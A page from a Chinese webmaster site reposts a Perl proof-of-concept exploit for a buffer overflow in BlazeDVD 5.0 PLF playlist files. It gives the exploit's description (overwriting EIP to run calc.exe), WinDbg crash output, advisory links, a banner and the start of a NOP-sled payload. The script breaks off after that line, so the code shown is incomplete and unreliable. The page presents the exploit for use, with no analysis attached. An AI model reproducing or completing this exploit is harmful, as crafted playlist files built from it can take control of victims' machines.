站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: TGS CMS 0.3.2r2 Remote Code Execution Exploit
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 黑客漏洞 > » 正文

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploi

来源: 易采站长站
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDgb(output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
# print "\n|==================================================================|\n";
print "| |\n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "| by LiquidWorm <liquidworm [at] gmail.com> |\n";
print "| |\n";
print "|==================================================================|\n\n"; $nop = "\x90" x 96;
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -